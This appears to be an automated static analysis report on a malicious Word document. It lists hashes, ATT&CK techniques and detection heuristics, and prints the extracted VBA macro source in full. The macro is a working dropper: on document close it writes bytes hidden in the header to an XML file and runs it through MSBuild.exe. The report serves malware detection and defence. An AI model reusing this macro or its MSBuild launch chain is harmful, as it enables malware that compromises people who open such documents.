Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 153316dd54b30790…

MALICIOUS

Office (OOXML)

Size: 17.0 KB | Created: 2021-06-16 07:08:00 UTC | Authoring application: Microsoft Office Word 16.0000 | First seen: 2026-06-04
MD5: a787f8ef0d4ce6b59a538306c60f94da | SHA-1: 08ab90023fae0a7b7d7e9557f854852b073866a2 | SHA-256: 153316dd54b30790a38dfc900ae860889548376361af8545745acf3aba1bb495
Risk Score: 70

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros that run from the Document_Close event. The writeOutHeader routine reads the text of the document's primary section header, splits it on ';' and writes each field as a raw byte to a file named KB84436869.xml in the user's local app data directory, using Environ("LOCALAPPDATA") to build the path. The DoStuff routine then launches that file with MSBuild.exe through the ShellExecuteA API, so the dropped XML is executed as an MSBuild project, indicating downloader or dropper functionality. Because the payload bytes are stored in the header text rather than in the VBA source, they are not recoverable from the macro listing alone. The use of Environ() to construct paths, the header-to-file decoding loop and the ShellExecuteA call to a LOLBin are indicative of malicious intent.

Heuristics (4)

  • VBA project inside OOXML (severity: medium; 2 related findings; OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • VBA p-code auto-exec with execution tokens (severity: high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Environ() call (env variable access) (severity: low; OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script
        dropPath = Environ("LOCALAPPDATA") & "\KB84436869.xml"
  • Embedded URL (severity: info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed below is a standard Office Open XML namespace URI declared in the package's XML parts, not a network indicator; none is contacted by the macro.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2014/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/markup-compatibility/2006 [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2016/ink [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/drawing/2017/model3d [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/officeDocument/2006/math [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing [In document text (OOXML body / shared strings)]
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordml [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2012/wordml [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2016/wordml/cid [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2015/wordml/symex [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2006/wordml [In document text (OOXML body / shared strings)]
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape [In document text (OOXML body / shared strings)]

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1868 bytes
SHA-256: 477baed692c0e4f55fc26e9259215dd2c3f4abaadc96ddc7d7c2d696c550224b
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Declare PtrSafe Function ShellExecuteA Lib "Shell32.dll" _
        (ByVal hwnd As Long, _
        ByVal lpOperation As String, _
        ByVal lpFile As String, _
        ByVal lpParameters As String, _
        ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long


Sub writeOutHeader()
    On Error Resume Next
    Dim intFileNum As Integer
    Dim byteTemp As Byte
    Dim strByte1 As String
    Dim i, j, k As Double
    Dim strIn As String
    Dim blnDone As Boolean
    intFileNum = FreeFile
    Dim dropPath As String
    
    dropPath = Environ("LOCALAPPDATA") & "\KB84436869.xml"

    Open dropPath For Binary As intFileNum

    strIn = ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text
    blnDone = False
    i = 1
    j = 1

    Do While Not blnDone
        k = InStr(i + 1, strIn, ";")
        If k = 0 Then
            blnDone = True
        Else
            blnDone = False
            strByte1 = Mid(strIn, i + 1, k - i - 1)
            ' a = CLng(strByte1)
            Put intFileNum, , CByte(strByte1)
            i = k
            strByte1 = ""
            j = j + 1
            End If
    Loop
    Close intFileNum
End Sub

Sub DoStuff()

Dim retval As Long
retval = ShellExecuteA(0, "open", "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", Environ("LOCALAPPDATA") & "\KB84436869.xml", "", 0)

End Sub

Private Sub Document_Close()

'#
    writeOutHeader
    DoStuff
End Sub

Attribute VB_Name = "NewMacros"
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 12288 bytes
SHA-256: 5ccbb861602bdbf9282acc3501c17c43f48b723ff27b4bf5b43c6845c221eca0